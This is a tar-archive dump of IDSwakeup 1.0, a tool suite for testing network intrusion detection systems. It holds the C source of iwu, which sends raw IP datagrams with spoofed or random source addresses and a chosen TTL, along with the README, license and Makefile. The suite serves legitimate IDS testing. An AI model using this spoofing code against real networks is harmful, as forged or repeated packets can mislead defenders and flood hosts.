"\ 4500 003e 2698 0000 4011 fee1 0101 0101 \ 0202 0202 04e1 7a69 002a 767a 7468 6174 \ 2773 2066 756e 2069 736e 2774 2069 7420 \ 3f20 2e2e 2e20 7361 2f68 7363 200a" } ### Main ################# IDSwakeup echo ### EOF ################## IDSwakeup-1.0/iwu.c0100644000175000001440000000505307171561434013373 0ustar aubertusers/* sa/hsc */ /* from RFProwl.c by rfp */ /* compile by : gcc iwu.c -lnet -o iwu */ #define LIBNET_LIL_ENDIAN 1 #undef LIBNET_BIG_ENDIAN 1 /* Random IP Spoofing Mode -- ultima -- synk4.c */ #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) #include #include #include u_long getaddr(char *name) { struct hostent *hep; hep=gethostbyname(name); if(!hep) { fprintf(stderr, "Unknown host %s\n", name); exit(1); } return *(unsigned long *)hep->h_addr; } int main(int argc, char **argv) { int sock, c, i, j, d; int byte1, byte2, byte3, byte4; char spoofaddr[32]; u_long src_ip, dst_ip; int nbtimes, ttl, len=0, nread=0; char version[]="0.1"; unsigned char *p, hex[2]; unsigned char sig[1500]; int verbose = 0; if( argc != 6 ) { printf("-=- IDS-wake-up by sa/hsc (version %s)-=-\n", version ); printf("Usage : ./iwu \n"); printf("example: ./iwu 10.0.0.1 20.0.0.2 200 4 \"4500 0018 00f2 0003 4011 73db 0101 0101 0202 0202 e63e 4494\"\n"); exit(EXIT_FAILURE); } srand(time(0)*getpid()*getppid()); dst_ip=inet_addr(argv[2]); nbtimes=atoi(argv[3]); ttl=atoi(argv[4]); for( p=argv[5],j=0; *p && j<1500; p++ ) { if( isalnum(*p) ) { if( nread==0 ) { nread = 1; hex[0] = *p; } else { nread = 0; hex[1] = *p; sscanf(hex, "%x", &d); sig[j++] = (unsigned char)d; len += 1; } } } if( len <= 0 ) exit(EXIT_FAILURE); sock = libnet_open_raw_sock(IPPROTO_RAW); if( sock == -1 ) { perror("Socket problems: "); exit(EXIT_FAILURE); } if( ttl < 0 || ttl > 0xFF ) ttl = 66; if( nbtimes <= 0 ) nbtimes = 1; while( nbtimes-- ) { if( strcmp(argv[1], "0" ) == 0 ) { byte1 = getrandom(50, 255); byte2 = getrandom(0, 255); byte3 = getrandom(0, 255); byte4 = getrandom(0, 255); sprintf(spoofaddr, "%i.%i.%i.%i", byte1, byte2, byte3, byte4); src_ip = getaddr(spoofaddr); } else { src_ip=inet_addr(argv[1]); } memcpy(sig+16,&dst_ip,4); memcpy(sig+12,&src_ip,4); memcpy(sig+8,&ttl,1); c = libnet_write_ip(sock, sig, len); if( c < len ) printf("Write_ip choked\n"); if( c == -1 ) return( EXIT_FAILURE ); } return( EXIT_SUCCESS); } IDSwakeup-1.0/README0100600000175000001440000000332707171561434013275 0ustar aubertusersIDSwakeup Stephane Aubert IDSwakeup is a collection of tools that allows to test network intrusion detection systems. The main goal of IDSwakeup is to generate false attack that mimic well known ones, in order to see if NIDS detects them and generates false positives. Like nidsbench (http://www.anzen.com/research/nidsbench/), IDSwakeup is being published in the hopes that a more precise testing methodology might be applied to network intrusion detection, which is *still* a black art at best. This release of IDSwakeup includes: . IDSwakeup The main shell script that permits to launch hping2 or iwu. The user just has to choose which attack or set of attacks he or she want to mimic. The user can also fix the ttl to produce short ttl and impact only NIDS and not the servers. Usage: ./IDSwakeup [nb] [ttl] IDSwakeup needs hping2 (http://www.kyuzz.org/antirez/hping/). . iwu Send a buffer as a datagram. It allows to change the source address, the destination address, the ttl (in order to produce short TTL). It also takes as parameter the number of times the user wants to send the same datagram. Usage: ./iwu Example: ./iwu 10.0.0.1 20.0.0.2 200 4 \ "4500 0018 00f2 0003 4011 73db 0101 0101 0202 0202 e63e 4494" iwu needs libnet 1.x (http://www.packetfactory.net/Projects/Libnet/). IDSwakeup suite is written by Stephane Aubert , it is available in a beta version and published under a BSD-style license. The IDSwakeup primary download site is the following: http://www.hsc.fr/ressources/outils/ IDSwakeup-1.0/LICENSE0100600000175000001440000000306107171561434013415 0ustar aubertusersCopyright (c) 2000, Stephane Aubert All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. - Neither name of the Hervé Schauer Consultants nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. IDSwakeup-1.0/Makefile0100600000175000001440000000072607171561434014055 0ustar aubertusersCC = gcc RM = /bin/rm CPPFLAGS = #CFLAGS = -O2 -g -Wall -pedantic CFLAGS = -O2 LDFLAGS = HEADERS = SRCS = iwu.c OBJS = iwu.o LIBS = -lnet all: iwu iwu: $(OBJS) $(CC) $(LDFLAGS) -o $@ $? $(LIBS) ; \ iwu.o: $(SRCS) $(HEADERS) # $(CC) $(CPPFLAGS) $(CFLAGS) -o $@ -c $(SRCS) dist: all mkdir IDSwakeup-1.0 cp IDSwakeup iwu.c README LICENSE Makefile IDSwakeup-1.0/ tar cvzf IDSwakeup-1.0.tgz IDSwakeup-1.0/ rm -fr ./IDSwakeup-1.0/ clean: $(RM) -f $(OBJS) iwu *~